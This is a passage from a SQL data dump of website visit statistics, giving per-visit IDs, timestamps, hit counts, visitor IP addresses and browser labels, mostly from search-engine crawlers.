1560393382,2,2,0,0,'40.77.167.52','other'),(427601,1560394288,1,1,0,0,'178.154.244.11','other'),(427602,1560394313,1,1,0,0,'66.249.66.130','chrome'),(427603,1560394960,1,1,0,0,'37.9.113.20','other'),(427604,1560395120,1,1,0,0,'66.249.66.132','chrome'),(427605,1560395136,2,2,0,0,'66.249.66.218','chrome'),(427606,1560395728,1,1,0,0,'207.46.13.61','other'),(427607,1560396071,3,3,0,0,'66.249.66.218','chrome'),(427608,1560396237,1,1,0,0,'46.211.50.60','chrome'),(427609,1560396665,1,1,0,0,'207.46.13.156','other'),(427610,1560396971,1,1,0,0,'46.211.97.42','chrome'),(427611,1560397269,1,1,0,0,'178.154.244.11','other'),(427612,1560397622,2,2,0,0,'91.196.178.132','firefox'),(427613,1560398428,1,1,0,0,'8.29.198.26','other'),(427614,1560398693,1,1,0,0,'207.46.13.129','other'),(427615,1560398880,1,1,0,0,'101.99.75.135','chrome'),(427616,1560399075,1,1,0,0,'8.29.198.27','other'),(427617,1560399300,1,1,0,0,'66.249.66.220','chrome'),(427618,1560399839,2,2,0,0,'66.249.66.222','chrome'),(427619,1560401644,1,1,0,0,'66.249.66.220','chrome'),(427620,1560401860,1,1,0,0,'5.45.207.79','other'),(427621,1560401881,1,1,0,0,'157.55.39.94','other'),(427622,1560402055,1,1,0,0,'66.249.66.132','chrome'),(427623,1560402210,1,1,0,0,'66.249.66.128','chrome'),(427624,1560403128,2,2,0,0,'66.249.66.222','chrome'),(427625,1560403172,2,2,0,0,'66.249.66.130','chrome'),(427626,1560403175,1,1,0,0,'157.55.39.221','other'),(427627,1560403229,1,1,0,0,'157.55.39.94','other'),(427628,1560403789,2,2,0,0,'66.249.66.220','chrome'),(427629,1560404274,1,1,0,0,'157.55.39.94','other'),(427630,1560405123,1,1,0,0,'157.55.39.153','other'),(427631,1560405744,3,3,0,0,'66.249.66.220','chrome'),(427632,1560405892,1,1,0,0,'46.211.66.186','chrome'),(427633,1560405918,1,1,0,0,'37.53.85.172','chrome'),(427634,1560406127,1,1,0,0,'91.196.178.82','chrome'),(427635,1560406389,1,1,0,0,'66.249.66.222','chrome'),(427636,1560406660,1,1,0,0,'157.55.39.94','other'),(427637,1560406744,1,1,0,0,'87.250.224.47','other'),(427638,1560407685,1,1,0,0,'2.234.219.120','chrome'),(427639,1560407927,1,1,0,0,'5.196.87.173','other'),(427640,1560408771,2,2,0,0,'66.249.66.132','chrome'),(427641,1560408841,1,1,0,0,'37.53.89.92','chrome'),(427642,1560408901,1,1,0,0,'157.55.39.153','other'),(427643,1560409284,2,2,0,0,'8.29.198.25','other'),(427644,1560409381,2,2,0,0,'66.249.66.220','chrome'),(427645,1560409595,1,1,0,0,'91.196.178.71','chrome'),(427646,1560409701,1,1,0,0,'66.249.66.132','chrome'),(427647,1560409713,2,2,0,0,'66.249.66.218','chrome'),(427648,1560410376,1,1,0,0,'37.73.214.167','chrome'),(427649,1560410724,1,1,0,0,'5.45.207.79','other'),(427650,1560410773,3,2,1,0,'66.249.66.222',''),(427651,1560410842,3,3,0,0,'66.249.66.218','chrome'),(427652,1560410874,1,1,0,0,'157.55.39.94','other'),(427653,1560410993,1,1,0,0,'66.249.66.132','chrome'),(427654,1560411161,3,3,0,0,'66.249.66.128','chrome'),(427655,1560411337,1,1,0,0,'91.196.178.82','chrome'),(427656,1560411450,3,3,0,0,'66.249.66.220','chrome'),(427657,1560411616,1,1,0,0,'157.55.39.153','other'),(427658,1560411839,1,1,0,0,'157.55.39.11','other'),(427659,1560412090,1,1,0,0,'66.249.66.222','chrome'),(427660,1560412111,1,1,0,0,'37.9.113.20','other'),(427661,1560412147,1,1,0,0,'130.180.218.212','chrome'),(427662,1560412218,1,1,0,0,'193.106.30.98','chrome'),(427663,1560412260,1,1,0,0,'66.249.66.130','chrome'),(427664,1560412312,1,1,0,0,'51.68.152.26','chrome'),(427665,1560412627,1,1,0,0,'5.196.87.171','other'),(427666,1560412877,1,1,0,0,'157.55.39.153','other'),(427667,1560412945,1,1,0,0,'5.196.87.172','other'),(427668,1560413302,1,1,0,0,'66.249.66.130','chrome'),(427669,1560413577,1,1,0,0,'66.249.66.132','chrome'),(427670,1560413691,2,2,0,0,'66.249.66.220','chrome'),(427671,1560414107,3,3,0,0,'66.249.66.218','chrome'),(427672,1560414756,1,1,0,0,'5.196.87.172','other'),(427673,1560415121,2,2,0,0,'66.249.66.220','chrome'),(427674,1560415717,5,5,0,0,'5.189.178.48','other'),(427675,1560415845,3,3,0,0,'66.249.66.218','chrome'),(427676,1560415947,1,1,0,0,'66.249.66.128','chrome'),(427677,1560416206,1,1,0,0,'54.209.227.199','other'),(427678,1560416507,1,1,0,0,'207.46.13.234','other'),(427679,1560416571,2,2,0,0,'66.249.66.130','chrome'),(427680,1560416981,1,1,0,0,'40.77.167.201','other'),(427681,1560417205,1,1,0,0,'144.76.137.254','other'),(427682,1560417545,1,1,0,0,'66.249.66.220','chrome'),(427683,1560417879,1,1,0,0,'157.55.39.11','other'),(427684,1560418084,2,2,0,0,'207.46.13.234','other'),(427685,1560418137,1,1,0,0,'66.249.66.218','chrome'),(427686,1560418303,1,1,0,0,'178.154.244.11','other'),(427687,1560418482,1,1,0,0,'66.249.66.132','chrome'),(427688,1560418518,1,1,0,0,'46.0.119.122','msie'),(427689,1560418604,1,1,0,0,'66.249.66.128','chrome'),(427690,1560418764,1,1,0,0,'66.249.66.220','chrome'),(427691,1560419358,1,1,0,0,'66.249.66.222','chrome'),(427692,1560420082,1,1,0,0,'66.249.66.130','chrome'),(427693,1560420139,1,1,0,0,'8.29.198.27','other'),(427694,1560420146,1,1,0,0,'109.74.154.72','chrome'),(427695,1560420155,1,1,0,0,'66.249.66.218','chrome'),(427696,1560420352,1,1,0,0,'157.55.39.100','other'),(427697,1560420472,1,1,0,0,'66.249.66.132','chrome'),(427698,1560420761,1,1,0,0,'8.29.198.25','other'),(427699,1560420882,1,1,0,0,'207.46.13.234','other'),(427700,1560421242,1,1,0,0,'5.196.87.174','other'),(427701,1560421362,2,2,0,0,'66.249.66.222','chrome'),(427702,1560421741,1,1,0,0,'66.249.66.128','chrome'),(427703,1560422136,1,1,0,0,'66.249.66.132','chrome'),(427704,1560422279,2,2,0,0,'66.249.66.222','chrome'),(427705,1560422482,1,1,0,0,'66.249.66.220','chrome'),(427706,1560422500,2,2,0,0,'66.249.66.218','chrome'),(427707,1560422724,1,1,0,0,'5.196.87.175','other'),(427708,1560423096,2,2,0,0,'66.249.66.128','chrome'),(427709,1560423890,1,1,0,0,'157.55.39.100','other'),(427710,1560424182,1,1,0,0,'157.55.39.128','other'),(427711,1560424303,1,1,0,0,'66.249.66.132','chrome'),(427712,1560424794,1,1,0,0,'40.77.167.176','other'),(427713,1560425013,1,1,0,0,'157.55.39.100','other'),(427714,1560425141,1,1,0,0,'66.249.66.220','chrome'),(427715,1560425432,1,1,0,0,'66.249.66.218','chrome'),(427716,1560426645,5,5,0,0,'66.249.66.218','chrome'),(427717,1560426663,1,1,0,0,'66.249.66.220','chrome'),(427718,1560426874,1,1,0,0,'157.55.39.128','other'),(427719,1560427022,1,1,0,0,'40.77.167.176','other'),(427720,1560427222,1,1,0,0,'66.249.66.130','chrome'),(427721,1560428106,1,1,0,0,'95.132.45.134','firefox'),(427722,1560428290,1,1,0,0,'40.77.167.176','other'),(427723,1560429512,1,1,0,0,'91.196.178.82','chrome'),(427724,1560429524,2,2,0,0,'66.249.66.222','chrome'),(427725,1560429835,1,1,0,0,'40.77.167.176','other'),(427726,1560429867,1,1,0,0,'212.113.42.167','chrome'),(427727,1560430350,1,1,0,0,'157.55.39.100','other'),(427728,1560430412,3,3,0,0,'5.45.207.79','other'),(427729,1560430994,1,1,0,0,'212.113.42.167','chrome'),(427730,1560431022,1,1,0,0,'8.29.198.26','other'),(427731,1560431024,1,1,0,0,'178.154.244.11','other'),(427732,1560431491,1,1,0,0,'66.249.66.222','chrome'),(427733,1560431519,2,2,0,0,'66.249.66.218','chrome'),(427734,1560431566,1,1,0,0,'66.249.66.130','chrome'),(427735,1560431623,1,1,0,0,'8.29.198.25','other'),(427736,1560432493,1,1,0,0,'66.249.66.222','chrome'),(427737,1560432512,1,1,0,0,'40.77.167.83','other'),(427738,1560432747,3,3,0,0,'66.249.66.220','chrome'),(427739,1560432832,1,1,0,0,'66.249.66.218','chrome'),(427740,1560432909,1,1,0,0,'91.202.242.168','chrome'),(427741,1560432954,1,1,0,0,'66.249.66.132','chrome'),(427742,1560432994,1,1,0,0,'5.196.87.174','other'),(427743,1560433087,1,1,0,0,'66.249.66.130','chrome'),(427744,1560433347,1,1,0,0,'66.111.60.37','chrome'),(427745,1560433849,1,1,0,0,'91.196.177.193','chrome'),(427746,1560434009,1,1,0,0,'5.196.87.174','other'),(427747,1560434072,1,1,0,0,'91.196.178.166','chrome'),(427748,1560434178,1,1,0,0,'107.178.194.252','chrome'),(427749,1560434407,1,1,0,0,'5.45.207.79','other'),(427750,1560434424,1,1,0,0,'40.77.167.205','other'),(427751,1560434751,2,2,0,0,'40.77.167.206','other'),(427752,1560435112,5,5,0,0,'66.96.214.58','other'),(427753,1560435148,1,1,0,0,'66.249.66.132','chrome'),(427754,1560435260,1,1,0,0,'40.77.167.132','other'),(427755,1560435442,3,3,0,0,'66.249.66.220','chrome'),(427756,1560435886,1,1,0,0,'180.76.15.143','other'),(427757,1560436157,1,1,0,0,'207.46.13.163','other'),(427758,1560436330,1,1,0,0,'40.77.167.132','other'),(427759,1560436422,1,1,0,0,'5.196.87.174','other'),(427760,1560436954,2,2,0,0,'66.249.66.222','chrome'),(427761,1560437350,3,3,0,0,'66.249.66.220','chrome'),(427762,1560438482,1,1,0,0,'66.249.66.132','chrome'),(427763,1560438913,1,1,0,0,'193.106.30.98','chrome'),(427764,1560440309,1,1,0,0,'40.77.167.16','other'),(427765,1560440372,2,2,0,0,'66.249.66.128','chrome'),(427766,1560440572,1,1,0,0,'66.249.66.222','chrome'),(427767,1560440987,1,1,0,0,'66.249.66.130','chrome'),(427768,1560441113,4,4,0,0,'66.249.66.218','chrome'),(427769,1560441444,1,1,0,0,'5.196.87.171','other'),(427770,1560441617,1,1,0,0,'66.249.66.132','chrome'),(427771,1560441646,4,4,0,0,'66.249.66.220','chrome'),(427772,1560441868,1,1,0,0,'8.29.198.25','other'),(427773,1560442482,1,1,0,0,'8.29.198.26','other'),(427774,1560442842,1,1,0,0,'66.249.66.130','chrome'),(427775,1560442926,2,2,0,0,'66.249.66.218','chrome'),(427776,1560443505,1,1,0,0,'40.77.167.132','other'),(427777,1560443651,1,1,0,0,'207.46.13.161','other'),(427778,1560444302,1,1,0,0,'66.249.66.128','chrome'),(427779,1560444370,1,1,0,0,'157.55.39.189','other'),(427780,1560444540,2,2,0,0,'66.249.66.220','chrome'),(427781,1560444544,2,2,0,0,'66.249.66.132','chrome'),(427782,1560444697,1,1,0,0,'66.249.66.218','chrome'),(427783,1560444944,1,1,0,0,'66.249.66.222','chrome'),(427784,1560445566,1,1,0,0,'66.249.66.220','chrome'),(427785,1560446296,1,1,0,0,'66.249.66.132','chrome'),(427786,1560446348,2,2,0,0,'66.249.66.222','chrome'),(427787,1560446374,1,1,0,0,'66.249.66.128','chrome'),(427788,1560446491,1,1,0,0,'40.77.167.16','other'),(427789,1560446880,2,2,0,0,'66.249.66.220','chrome'),(427790,1560447047,1,1,0,0,'40.77.167.132','other'),(427791,1560447226,1,1,0,0,'207.46.13.161','other'),(427792,1560447398,1,1,0,0,'66.249.66.132','chrome'),(427793,1560447490,2,2,0,0,'66.249.66.218','chrome'),(427794,1560447498,1,1,0,0,'40.77.167.16','other'),(427795,1560447551,1,1,0,0,'66.249.66.130','chrome'),(427796,1560447960,1,1,0,0,'5.45.207.79','other'),(427797,1560448305,1,1,0,0,'91.196.178.80','firefox'),(427798,1560448506,1,1,0,0,'66.249.66.222','chrome'),(427799,1560448820,1,1,0,0,'66.249.66.130','chrome'),(427800,1560448867,2,2,0,0,'40.77.167.16','other'),(427801,1560449149,1,1,0,0,'5.196.87.175','other'),(427802,1560449244,3,3,0,0,'66.249.66.218','chrome'),(427803,1560449605,1,1,0,0,'66.249.66.132','chrome'),(427804,1560450676,1,1,0,0,'157.55.39.230','other'),(427805,1560451023,2,2,0,0,'66.249.66.220','chrome'),(427806,1560451186,1,1,0,0,'66.249.66.218','chrome'),(427807,1560451324,1,1,0,0,'157.55.39.189','other'),(427808,1560451835,1,1,0,0,'40.77.167.102','other'),(427809,1560452312,1,1,0,0,'90.188.236.43','chrome'),(427810,1560452547,3,3,0,0,'66.249.66.220','chrome'),(427811,1560452726,1,1,0,0,'8.29.198.25','other'),(427812,1560452783,1,1,0,0,'40.77.167.102','other'),(427813,1560452965,1,1,0,0,'66.249.66.218','chrome'),(427814,1560453349,1,1,0,0,'8.29.198.27','other'),(427815,1560453378,1,1,0,0,'66.249.66.132','chrome'),(427816,1560453426,1,1,0,0,'5.45.207.79','other'),(427817,1560453887,1,1,0,0,'157.55.39.230','other'),(427818,1560453943,2,2,0,0,'66.249.66.218','chrome'),(427819,1560454227,1,1,0,0,'66.249.66.222','chrome'),(427820,1560454296,3,3,0,0,'66.249.66.220','chrome'),(427821,1560454407,1,1,0,0,'66.249.66.128','chrome'),(427822,1560454522,2,2,0,0,'40.77.167.102','other'),(427823,1560455045,2,2,0,0,'157.55.39.189','other'),(427824,1560455050,1,1,0,0,'207.46.13.82','other'),(427825,1560455947,2,2,0,0,'66.249.66.220','chrome'),(427826,1560456024,1,1,0,0,'66.249.66.128','chrome'),(427827,1560456485,4,4,0,0,'66.249.66.218','chrome'),(427828,1560456552,2,2,0,0,'66.249.66.222','chrome'),(427829,1560456705,1,1,0,0,'5.45.207.79','other'),(427830,1560457124,1,1,0,0,'180.76.15.5','other'),(427831,1560457362,1,1,0,0,'5.196.87.173','other'),(427832,1560457442,2,2,0,0,'66.249.66.220','chrome'),(427833,1560457604,1,1,0,0,'66.249.66.130','chrome'),(427834,1560457624,1,1,0,0,'66.249.66.132','chrome'),(427835,1560457785,1,1,0,0,'66.249.66.128','chrome'),(427836,1560458339,1,1,0,0,'207.46.13.82','other'),(427837,1560458413,1,1,0,0,'66.249.66.220','chrome'),(427838,1560458916,1,1,0,0,'40.77.167.102','other'),(427839,1560458942,1,1,0,0,'5.196.87.172','other'),(427840,1560459143,1,1,0,0,'93.79.116.138','chrome'),(427841,1560459492,1,1,0,0,'66.249.66.218','chrome'),(427842,1560459822,1,1,0,0,'157.55.39.156','other'),(427843,1560460322,1,1,0,0,'66.249.66.220','chrome'),(427844,1560460334,1,1,0,0,'178.154.244.65','other'),(427845,1560460344,1,1,0,0,'157.55.39.189','other'),(427846,1560460589,1,1,0,0,'207.46.13.82','other'),(427847,1560461252,1,1,0,0,'5.45.207.19','other'),(427848,1560461829,1,1,0,0,'66.249.66.218','chrome'),(427849,1560462021,1,1,0,0,'66.249.66.128','chrome'),(427850,1560462117,1,1,0,0,'5.196.87.171','other'),(427851,1560463534,1,1,0,0,'207.46.13.82','other'),(427852,1560463599,1,1,0,0,'8.29.198.25','other'),(427853,1560464110,1,1,0,0,'66.249.66.222','chrome'),(427854,1560464218,1,1,0,0,'8.29.198.26','other'),(427855,1560464367,3,3,0,0,'66.249.66.220','chrome'),(427856,1560464488,1,1,0,0,'13.66.139.0','other'),(427857,1560464706,1,1,0,0,'157.55.39.189','other'),(427858,1560465843,1,1,0,0,'193.106.30.98','chrome'),(427859,1560466378,2,2,0,0,'66.249.66.136','chrome'),(427860,1560467286,1,1,0,0,'66.249.66.138','chrome'),(427861,1560468428,2,2,0,0,'66.249.66.138','chrome'),(427862,1560468511,2,2,0,0,'66.249.66.68','chrome'),(427863,1560468579,1,1,0,0,'66.249.66.64','chrome'),(427864,1560468661,1,1,0,0,'5.45.207.19','other'),(427865,1560469222,2,2,0,0,'66.249.66.134','chrome'),(427866,1560469610,2,2,0,0,'66.249.66.138','chrome'),(427867,1560470041,2,2,0,0,'66.249.66.66','chrome'),(427868,1560470077,4,4,0,0,'66.249.66.136','chrome'),(427869,1560471247,1,1,0,0,'66.249.66.138','chrome'),(427870,1560471281,1,1,0,0,'66.249.66.68','chrome'),(427871,1560471597,1,1,0,0,'66.249.66.134','chrome'),(427872,1560472236,1,1,0,0,'66.249.66.66','chrome'),(427873,1560472305,1,1,0,0,'207.46.13.62','other'),(427874,1560472360,2,2,0,0,'66.249.66.136','chrome'),(427875,1560472578,1,1,0,0,'23.100.232.233','msie'),(427876,1560473153,2,2,0,0,'66.249.66.134','chrome'),(427877,1560474187,1,1,0,0,'40.77.167.101','other'),(427878,1560474188,1,1,0,0,'66.249.66.136','chrome'),(427879,1560474434,2,2,0,0,'66.249.66.138','chrome'),(427880,1560474456,2,2,0,0,'8.29.198.25','other'),(427881,1560475171,2,2,0,0,'66.249.66.66','chrome'),(427882,1560475849,1,1,0,0,'66.249.66.138','chrome'),(427883,1560475872,4,4,0,0,'66.249.66.136','chrome'),(427884,1560475911,2,2,0,0,'66.249.66.134','chrome'),(427885,1560476166,1,1,0,0,'66.249.66.68','chrome'),(427886,1560476565,1,1,0,0,'66.249.66.66','chrome'),(427887,1560477389,1,1,0,0,'66.249.66.134','chrome'),(427888,1560477577,2,2,0,0,'66.249.66.68','chrome'),(427889,1560477854,2,2,0,0,'66.249.66.138','chrome'),(427890,1560477886,2,2,0,0,'66.249.66.136','chrome'),(427891,1560478904,1,1,0,0,'66.249.66.138','chrome'),(427892,1560478960,1,1,0,0,'66.249.66.136','chrome'),(427893,1560479851,1,1,0,0,'5.45.207.79','other'),(427894,1560479860,1,1,0,0,'207.46.13.73','other'),(427895,1560480524,1,1,0,0,'66.249.66.66','chrome'),(427896,1560480537,1,1,0,0,'66.249.66.136','chrome'),(427897,1560480857,1,1,0,0,'66.249.66.138','chrome'),(427898,1560481195,1,1,0,0,'91.196.178.83','chrome'),(427899,1560482233,2,2,0,0,'66.249.66.134','chrome'),(427900,1560482380,1,1,0,0,'66.249.66.138','chrome'),(427901,1560482428,1,1,0,0,'81.171.75.163','chrome'),(427902,1560482601,1,1,0,0,'66.249.66.66','chrome'),(427903,1560482679,1,1,0,0,'66.249.66.64','chrome'),(427904,1560482723,1,1,0,0,'5.45.207.79','other'),(427905,1560483074,1,1,0,0,'23.100.232.233','msie'),(427906,1560483209,2,2,0,0,'207.46.13.18','other'),(427907,1560483958,1,1,0,0,'66.249.66.138','chrome'),(427908,1560484351,4,4,0,0,'66.249.66.136','chrome'),(427909,1560484573,1,1,0,0,'66.249.66.66','chrome'),(427910,1560485076,1,1,0,0,'207.46.13.18','other'),(427911,1560485317,1,1,0,0,'8.29.198.27','other'),(427912,1560485384,1,1,0,0,'207.46.13.17','other'),(427913,1560485389,2,2,0,0,'157.55.39.242','other'),(427914,1560485476,1,1,0,0,'5.45.207.79','other'),(427915,1560485921,1,1,0,0,'8.29.198.26','other'),(427916,1560485989,1,1,0,0,'37.9.113.103','other'),(427917,1560485995,1,1,0,0,'5.255.253.38','other'),(427918,1560486190,1,1,0,0,'66.249.66.136','chrome'),(427919,1560486228,1,1,0,0,'66.249.66.66','chrome'),(427920,1560486368,1,1,0,0,'66.249.66.138','chrome'),(427921,1560486640,1,1,0,0,'66.249.66.134','chrome'),(427922,1560487413,1,1,0,0,'66.249.66.138','chrome'),(427923,1560487933,556,556,0,0,'194.68.17.5','other'),(427924,1560488171,3,3,0,0,'66.249.66.136','chrome'),(427925,1560488336,9,9,0,0,'66.249.66.134','chrome'),(427926,1560488407,1,1,0,0,'66.249.66.138','chrome'),(427927,1560488834,307,307,0,0,'194.68.17.5','other'),(427928,1560489039,1,1,0,0,'66.249.66.68','chrome'),(427929,1560489269,1,1,0,0,'5.45.207.80','other'),(427930,1560489336,3,3,0,0,'66.249.66.64','chrome'),(427931,1560490281,1,1,0,0,'66.249.66.138','chrome'),(427932,1560490375,2,2,0,0,'66.249.66.136','chrome'),(427933,1560490557,1,1,0,0,'66.249.66.134','chrome'),(427934,1560490587,1,1,0,0,'66.249.66.64','chrome'),(427935,1560490640,4,4,0,0,'46.161.14.130','firefox'),(427936,1560491724,1,1,0,0,'66.249.66.138','chrome'),(427937,1560491926,1,1,0,0,'23.100.232.233','msie'),(427938,1560491951,2,2,0,0,'66.249.66.134','chrome'),(427939,1560491979,1,1,0,0,'87.250.224.47','other'),(427940,1560492324,1,1,0,0,'66.249.66.136','chrome'),(427941,1560492406,1,1,0,0,'207.46.13.50','other'),(427942,1560492475,1,1,0,0,'91.196.177.46','chrome'),(427943,1560492717,1,1,0,0,'66.249.66.64','chrome'),(427944,1560492997,1,1,0,0,'130.180.209.195','chrome'),(427945,1560493020,1,1,0,0,'207.46.13.17','other'),(427946,1560493498,1,1,0,0,'130.180.211.20','chrome'),(427947,1560493862,2,2,0,0,'66.249.66.136','chrome'),(427948,1560493964,1,1,0,0,'207.46.13.18','other'),(427949,1560494061,1,1,0,0,'66.249.66.64','chrome'),(427950,1560494503,1,1,0,0,'130.180.211.20','chrome'),(427951,1560494590,1,1,0,0,'213.180.203.9','other'),(427952,1560494681,1,1,0,0,'87.250.224.81','other'),(427953,1560494880,2,2,0,0,'66.249.66.134','chrome'),(427954,1560495400,1,1,0,0,'66.249.66.66','chrome'),(427955,1560495431,1,1,0,0,'207.46.13.50','other'),(427956,1560495501,4,4,0,0,'66.249.66.138','chrome'),(427957,1560495792,1,1,0,0,'37.53.89.92','chrome'),(427958,1560495945,1,1,0,0,'37.53.122.77','chrome'),(427959,1560496106,1,1,0,0,'66.249.66.136','chrome'),(427960,1560496122,1,1,0,0,'91.196.178.130','firefox'),(427961,1560496199,1,1,0,0,'8.29.198.27','other'),(427962,1560496345,2,2,0,0,'207.46.13.18','other'),(427963,1560496791,1,1,0,0,'8.29.198.25','other'),(427964,1560496992,1,1,0,0,'207.46.13.17','other'),(427965,1560498593,1,1,0,0,'207.46.13.235','other'),(427966,1560498696,1,1,0,0,'207.46.13.18','other'),(427967,1560500438,1,1,0,0,'180.76.15.16','other'),(427968,1560500635,1,1,0,0,'207.46.13.17','other'),(427969,1560501519,1,1,0,0,'91.196.178.82','chrome'),(427970,1560502177,1,1,0,0,'91.196.178.93','firefox'),(427971,1560502287,2,2,0,0,'136.243.90.101','chrome'),(427972,1560502320,3,3,0,0,'77.104.154.196','chrome'),(427973,1560502426,2,2,0,0,'77.104.145.249','chrome'),(427974,1560502438,1,1,0,0,'180.76.15.148','other'),(427975,1560502665,1,1,0,0,'66.249.66.138','chrome'),(427976,1560502676,1,1,0,0,'91.196.178.99','chrome'),(427977,1560502814,1,1,0,0,'72.52.226.70','chrome'),(427978,1560503010,1,1,0,0,'207.46.13.217','other'),(427979,1560503318,1,1,0,0,'91.196.178.71','chrome'),(427980,1560504162,1,1,0,0,'82.145.210.153','other'),(427981,1560504230,1,1,0,0,'91.196.178.82','chrome'),(427982,1560504252,1,1,0,0,'103.25.252.70','chrome'),(427983,1560504973,1,1,0,0,'91.196.178.170','chrome'),(427984,1560505028,1,1,0,0,'185.15.56.22','other'),(427985,1560505375,1,1,0,0,'207.46.13.127','other'),(427986,1560505379,3,3,0,0,'40.77.167.198','other'),(427987,1560506286,1,1,0,0,'37.53.89.92','chrome'),(427988,1560506928,1,1,0,0,'109.74.154.72','chrome'),(427989,1560506966,1,1,0,0,'130.180.216.13','chrome'),(427990,1560507053,1,1,0,0,'8.29.198.26','other'),(427991,1560507606,1,1,0,0,'46.211.135.38','chrome'),(427992,1560507641,1,1,0,0,'8.29.198.27','other'),(427993,1560508405,1,1,0,0,'91.196.178.93','firefox'),(427994,1560509851,1,1,0,0,'40.77.167.175','other'),(427995,1560510419,1,1,0,0,'207.46.13.127','other'),(427996,1560510479,1,1,0,0,'207.46.13.137','other'),(427997,1560511639,1,1,0,0,'207.46.13.217','other'),(427998,1560512066,3,3,0,0,'66.249.66.66','chrome'),(427999,1560512080,1,1,0,0,'46.211.111.19','chrome'),(428000,1560512087,1,1,0,0,'66.249.66.136','chrome'),(428001,1560512681,1,1,0,0,'207.46.13.137','other'),(428002,1560512777,1,1,0,0,'207.46.13.217','other'),(428003,1560513440,1,1,0,0,'77.111.244.70','chrome'),(428004,1560513471,1,1,0,0,'178.154.244.21','other'),(428005,1560513483,1,1,0,0,'87.250.224.81','other'),(428006,1560513669,1,1,0,0,'87.250.224.47','other'),(428007,1560513769,5,5,0,0,'66.249.66.134','chrome'),(428008,1560513967,1,1,0,0,'66.249.66.136','chrome'),(428009,1560514161,1,1,0,0,'168.0.133.15','chrome'),(428010,1560514207,1,1,0,0,'66.249.66.138','chrome'),(428011,1560514830,3,3,0,0,'207.46.13.127','other'),(428012,1560514842,1,1,0,0,'193.106.30.98','chrome'),(428013,1560514948,1,1,0,0,'46.211.97.30','chrome'),(428014,1560515906,1,1,0,0,'66.249.66.136','chrome'),(428015,1560516004,1,1,0,0,'66.249.66.134','chrome'),(428016,1560516108,1,1,0,0,'207.46.13.127','other'),(428017,1560516804,1,1,0,0,'157.55.39.235','other'),(428018,1560516918,1,1,0,0,'66.249.66.136','chrome'),(428019,1560516982,2,2,0,0,'66.249.66.138','chrome'),(428020,1560516985,1,1,0,0,'87.250.224.47','other'),(428021,1560517056,2,2,0,0,'66.249.66.134','chrome'),(428022,1560517198,1,1,0,0,'66.249.66.64','chrome'),(428023,1560517204,1,1,0,0,'177.101.144.117','chrome'),(428024,1560517363,2,2,0,0,'157.167.52.180','chrome'),(428025,1560517527,1,1,0,0,'46.211.133.42','chrome'),(428026,1560517638,1,1,0,0,'66.249.66.68','chrome'),(428027,1560517862,2,2,0,0,'66.249.66.136','chrome'),(428028,1560517905,2,2,0,0,'8.29.198.26','other'),(428029,1560518004,1,1,0,0,'66.249.66.134','chrome'),(428030,1560518081,2,2,0,0,'207.46.13.137','other'),(428031,1560518293,1,1,0,0,'66.249.66.138','chrome'),(428032,1560518433,1,1,0,0,'66.249.66.66','chrome'),(428033,1560518477,1,1,0,0,'207.46.13.127','other'),(428034,1560519231,1,1,0,0,'40.77.167.144','other'),(428035,1560519485,1,1,0,0,'66.249.66.138','chrome'),(428036,1560519565,1,1,0,0,'40.77.167.175','other'),(428037,1560519760,2,2,0,0,'66.249.66.134','chrome'),(428038,1560520098,3,3,0,0,'40.77.167.130','other'),(428039,1560520108,3,3,0,0,'207.46.13.172','other'),(428040,1560520113,4,4,0,0,'40.77.167.47','other'),(428041,1560520156,2,2,0,0,'207.46.13.127','other'),(428042,1560520985,2,2,0,0,'66.249.66.64','chrome'),(428043,1560521140,2,2,0,0,'66.249.66.134','chrome'),(428044,1560521183,1,1,0,0,'80.78.45.211','chrome'),(428045,1560521302,1,1,0,0,'157.55.39.145','other'),(428046,1560521398,2,2,0,0,'207.46.13.172','other'),(428047,1560521955,1,1,0,0,'66.249.66.66','chrome'),(428048,1560521984,3,3,0,0,'66.249.66.138','chrome'),(428049,1560522231,9,9,0,0,'66.249.66.134','chrome'),(428050,1560522393,9,9,0,0,'66.249.66.136','chrome'),(428051,1560522403,7,7,0,0,'66.249.66.64','chrome'),(428052,1560522433,3,3,0,0,'66.249.66.68','chrome'),(428053,1560522514,1,1,0,0,'40.77.167.12','other'),(428054,1560522797,1,1,0,0,'46.211.73.204','chrome'),(428055,1560522903,1,1,0,0,'157.55.39.145','other'),(428056,1560522951,1,1,0,0,'66.249.64.29','chrome'),(428057,1560523360,3,3,0,0,'66.249.66.66','chrome'),(428058,1560523367,6,6,0,0,'66.249.66.64','chrome'),(428059,1560523476,8,8,0,0,'66.249.66.136','chrome'),(428060,1560523565,4,3,1,0,'66.249.66.138',''),(428061,1560523586,28,28,0,0,'66.249.66.134','chrome'),(428062,1560524040,1,1,0,0,'66.249.66.138','chrome'),(428063,1560524051,1,1,0,0,'66.249.66.68','chrome'),(428064,1560524125,1,1,0,0,'40.77.167.159','other'),(428065,1560524310,1,1,0,0,'66.249.66.64','chrome'),(428066,1560524553,1,1,0,0,'23.247.81.42','chrome'),(428067,1560524581,1,1,0,0,'66.249.66.136','chrome'),(428068,1560524589,1,1,0,0,'157.55.39.144','other'),(428069,1560524633,1,1,0,0,'91.196.177.118','chrome'),(428070,1560524830,1,1,0,0,'66.249.66.134','chrome'),(428071,1560525131,1,1,0,0,'66.249.66.68','chrome'),(428072,1560525552,1,1,0,0,'176.9.9.94','other'),(428073,1560525562,1,1,0,0,'207.46.13.234','other'),(428074,1560525618,1,1,0,0,'213.180.203.53','other'),(428075,1560525627,2,2,0,0,'66.249.66.138','chrome'),(428076,1560525656,1,1,0,0,'37.73.140.60','chrome'),(428077,1560526054,1,1,0,0,'66.249.66.134','chrome'),(428078,1560526659,1,1,0,0,'157.55.39.145','other'),(428079,1560526750,2,2,0,0,'176.9.9.94','other'),(428080,1560527038,1,1,0,0,'157.55.39.144','other'),(428081,1560527270,2,2,0,0,'66.249.66.138','chrome'),(428082,1560527322,1,1,0,0,'207.46.13.234','other'),(428083,1560527473,1,1,0,0,'37.9.113.20','other'),(428084,1560527756,3,3,0,0,'66.249.66.134','chrome'),(428085,1560527842,1,1,0,0,'66.249.66.64','chrome'),(428086,1560527927,1,1,0,0,'66.249.66.136','chrome'),(428087,1560528339,3,3,0,0,'207.46.13.229','other'),(428088,1560528496,1,1,0,0,'207.46.13.234','other'),(428089,1560528501,4,4,0,0,'157.55.39.145','other'),(428090,1560528506,1,1,0,0,'157.55.39.144','other'),(428091,1560528723,3,3,0,0,'66.249.66.66','chrome'),(428092,1560528752,1,1,0,0,'66.249.66.138','chrome'),(428093,1560528766,1,1,0,0,'8.29.198.26','other'),(428094,1560529372,1,1,0,0,'8.29.198.27','other'),(428095,1560529530,5,5,0,0,'176.9.9.94','other'),(428096,1560529811,1,1,0,0,'77.222.143.222','msie